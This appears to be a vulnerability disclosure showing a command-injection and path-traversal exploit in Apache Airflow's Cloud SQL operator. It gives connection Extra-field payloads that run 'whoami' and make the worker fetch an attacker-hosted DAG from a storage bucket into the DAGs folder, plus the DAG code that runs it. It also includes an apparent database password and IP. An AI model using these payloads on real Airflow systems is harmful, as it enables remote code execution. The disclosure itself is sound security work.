Create the following Google Cloud SQL Database connection named aaa under the Admin->Connections menu.Among them, Host, Schema, Login, and Port are required, just fill in the content that conforms to the format.
{F2213508}
The actual content filled in Extra field is as follows. Note thatsql_proxy_versionmust be similar to ?a=
, and the value ofsql_proxy_binary_path is set to the command to be executed. Fill in ‘whoami’ here.
{
"project_id":"pivotal-gearing-375804",
"instance":"hellopg",
"location":"us-central1-b",
"database_type":"postgres",
"use_proxy":"True",
"use_ssl":"False",
"sql_proxy_use_tcp":"True",
"sql_proxy_version":"?a=",
"sql_proxy_binary_path":"whoami",
"sslcert":"",
"sslkey":"",
"sslrootcert":""
}
Create a google_test.py script that uses the CloudSQLExecuteQueryOperator operator, and put it in the /opt/airflow/dags
directory in the background so that it can be automatically loaded by airflow. The content is as follows, where gcp_cloudsql_conn_id is set to the connection name we established aboveaaa
from __future__ import annotations
import os
import subprocess
from datetime import datetime
from os.path import expanduser
from urllib.parse import quote_plus
from airflow import models
from airflow.providers.google.cloud.operators.cloud_sql import CloudSQLExecuteQueryOperator
SQL = [
"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)",
"CREATE TABLE IF NOT EXISTS TABLE_TEST (I INTEGER)", # shows warnings logged
"INSERT INTO TABLE_TEST VALUES (0)",
"CREATE TABLE IF NOT EXISTS TABLE_TEST2 (I INTEGER)",
"DROP TABLE TABLE_TEST",
"DROP TABLE TABLE_TEST2",
]
postgres_kwargs = dict(
user="postgres",
password=r"ktd2(%EzQ5",
public_port="5432",
public_ip="34.122.52.6",
project_id="pivotal-gearing-375804",
location="us-central1-b",
instance="hellopg",
database="postgres",
client_cert_file="key/postgres-client-cert.pem",
client_key_file=".key/postgres-client-key.pem",
server_ca_file=".key/postgres-server-ca.pem",
)
# Postgres: connect via proxy over TCP
os.environ["AIRFLOW_CONN_PROXY_POSTGRES_TCP"] = (
"gcpcloudsql://{user}:{password}@{public_ip}:{public_port}/{database}?"
"database_type=postgres&"
"project_id={project_id}&"
"location={location}&"
"instance={instance}&"
"use_proxy=True&"
"sql_proxy_use_tcp=True".format(**postgres_kwargs)
)
connection_names = [
"proxy_postgres_tcp",
]
with models.DAG(
dag_id="example_gcp_sql_query",
start_date=datetime(2021, 1, 1),
catchup=False,
tags=["example"],
) as dag:
prev_task = None
task = CloudSQLExecuteQueryOperator(
gcp_cloudsql_conn_id="aaa",gcp_conn_id="proxy_postgres_tcp",task_id="example_gcp_sql_task_proxy_postgres_tcp" , sql=SQL
)
# [END howto_operator_cloudsql_query_operators]
Enable theexample_gcp_sql_query DAG corresponding to ourgoogle_test.py script in the UI management interface, and run.
Click to view the running graph and logs through the Graph menu.
{F2213514}
It can be seen from the log that the victim machine executed the malicious parameter ‘whoami’ we constructed.
{F2213518}
Place our malicious dag via Google Cloud Starage at https://storage.googleapis.com/swordlight/load_my_evil_dag.py .The content is as follows:
from __future__ import annotations
import pendulum
from airflow import DAG
from airflow.decorators import task
from airflow.operators.bash import BashOperator
with DAG(
dag_id="load_my_evil_dag",
start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
catchup=False,
schedule=None,
tags=["example"],
) as dag:
bash_task = BashOperator(
task_id="bash_task",
bash_command='mkdir /tmp/success'
)
The purpose of this script is to create the /tmp/success folder.
{F2213523}
Modify the content of the Extra field as follows:
{
"project_id":"pivotal-gearing-375804",
"instance":"hellopg",
"location":"us-central1-b",
"database_type":"postgres",
"use_proxy":"True",
"use_ssl":"False",
"sql_proxy_use_tcp":"True",
"sql_proxy_version":"../swordlight/load_my_evil_dag.py?a=",
"sql_proxy_binary_path":"/../../../opt/airflow/dags/load_my_evil_dag.py",
"sslcert":"",
"sslkey":"",
"sslrootcert":""
}
Run, and then check the operation log, you can see that the victim machine sends request to https://storage.googleapis.com/cloudsql-proxy/…/swordlight/load_my_evil_dag.py?a=/cloud_sql_proxy.linux.amd64 (ie [https:/ /storage.googleapis.com/swordlight/load_my_evil_dag.py](https:/ /storage.googleapis.com/swordlight/load_my_evil_dag.py)) ,downloaded the load_my_evai_dag.py script and renamed it to /../../../opt/airflow/dags/load_my_evil_dag.py
(i.e. /opt/airflow/dags /load_my_evil_dag.py
)
You can also see the existence of the load_my_evil_dag.py
file in /opt/airflow/dags
of the woker terminal.
{F2213525}
{F2213528}
At the same time, through the DAGs list on the UI interface, we can also see that our DAG named load_my_evil_dag has been loaded successfully.
{F2213530}
Enable and run load_my_evil_dag.After running, you can see that the /tmp/success
folder is created successfully.
{F221353
When airflow does not enable authentication, the attacker can modify the existing connection configuration information, so that the DAG that uses CloudSQLExecuteQueryOperator in the system executes malicious commands or overwrites and creates arbitrary files(which will lead to Denial Of Service)at runtime.